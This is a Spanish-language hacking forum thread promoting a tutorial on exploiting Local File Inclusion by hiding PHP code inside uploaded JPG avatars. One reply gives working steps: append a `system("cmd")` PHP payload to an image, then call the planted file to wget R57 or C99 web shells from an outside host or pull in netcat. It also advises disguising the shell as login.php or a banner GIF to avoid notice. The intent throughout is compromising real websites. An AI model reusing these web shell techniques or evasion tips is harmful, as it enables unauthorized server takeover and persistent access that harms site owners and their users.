Este tutorial lo hice el otro día y lo mande a milw0rm, pero recién hoy lo subieron, ajajaj.

Como ustedes deben saber ya, los Local File Inclusion difieren de los comúnmente abusados Remote File Inclusion en el hecho de que no se puede ejecutar código (shells o demases) que estén alojados en otras webs remotas. Debido a esto, las formas mas comunes de abusar de este bug, es mediante la inyección de código PHP en los logs de los servidores o simplemente mediante la inclusion de archivos locales que posean info valiosa (/etc/passwd o similar).

Ahora, una de las razones por la cual esta vulnerabilidad esta poco "masificada" (en comparación al RFI) es principalmente debido al hecho de que poco o nada se puede hacer, pues bien muchas veces los directorios logs no son accesibles y en muchas otras la información "relevante" que se puede obtener, es demasiado incompleta como para poder sacar algún provecho.

Debido a eso, se me ocurrió entonces ver que pasa si uno inyecta código PHP en los comentarios de los JPG's. No estoy hablando de agarrar una shell en .txt y nombrarla .jpg, pues eso no nos va a servir, ya que lo que deseamos es poder ejecutar esa shell de modo local y por ende, debemos subirla al servidor. ¿Como subimos una shell .jpg al servidor?.. Haciendo un .jpg valido, de modo que lo subamos, en el caso de poderse, mediante cualquier aplicación web (foros, guestbooks o demases).

Como muchos saben, los JPG's tienen espacio para comentarios (ejemplo: cuando sacan fotos, y dice el modelo y marca de la cámara con que fue sacada).. entonces.. que pasa si inyectamos PHP ahí?. En el video que voy a adjuntar, explica paso a paso como realizar eso. Se puede hacer uso de un editor hexadecimal para lograrlo, pero es mas cómodo mediante una aplicación como la que incluyo pues, aparte de ser mas rápido, el comentario que incluye no es visto en las propiedades de la imagen, así que es incluso mas "oculto".

Así que, como muestra este video, cualquier sitio web con error de LFI o RFI y que incluya algún foro o similar, donde podamos subir imágenes (ejemplo: avatar) se va a ver en un serio peligro, pues podremos incluir cuanto código queramos y ejecutarlos sin problema de manera local.

Espero les guste el video.

Entren aca:
http://www.milw0rm.com/author/972
Hagan click a "Local JPG shell Inclusion (LFI using php injected JPG)"

Saludos 

Nice!! 

Muy interesante.... me gusto mucho

salu2

que bueno chico, el primer ejemplo que vi de lfi en jpg, excelente !!!

si que es el

en el video aprace el nombre de codebeak pero si te fijas bien tambien el de chiko

por cierto muy buena info

gracias

Muy bueno, le estuve echando un ojo, pero con mi poca experiencia me quedo una duda, Solo sirven para poder editar el index? o por ejemplo se puede colar algun troyano y eso por la foto.

Impresionante...

No es necesario usar un editor de comentarios para eso... solo escribe el codigo en un texto y luego ejecutas type texto >> imagen.jpg y veras que el codigo se incrusta dentro del jpg sin modificar la imagen.

abres el notepad y escribes:
<? system("cmd"); die; ?>
y lo guardas como inject.txt
Despues abres la consola de comandos y ejecutas:
type inject.txt >> imagen.jpg
Donde imagen.jpg puede ser tu avatar.

Veras que si abres la imagen se verá normal pero si lo abres con el block de notas podras ver el codigo injectado...
En realidad lo unico que le importa al apache es que el comando se encuentre dentro de lo que buelcas en pantalla como por ejemplo un zip.... index.php?file=demo.zip o index.php?file_path=http://web.iespana.es/inject.mp3

O puedes injectar un <? ob_clean(); ?> y a partir de eso le jalas un R57 o un C99 Shell si es que no te permite llamar archivos externos al servidor. A veces tambien puedes hacerlo desde un simple XSS injectando codigos PHP para ser ejecutados junto con el XSS.
O desde un desfacing: Echo ^<? system("cmd"); die; ?^> >> barner.gif para no llamar la atención desfaceando el index o cualquier otra sección y hacemos durar mas la shell  luego solo basta con llamar a barner.gif?cmd=wget -c -t0 http://pagina/R57.php o le ponemos login.php para no levantar sospechas  o jalamos el netcat directamente si el server es Unix.



Siempre y cuando el servidor te permita un safe off (Configuración que impide la ejecución de este tipo de codigos.) Por eso dicen que un administrador preparado es un servidor seguro.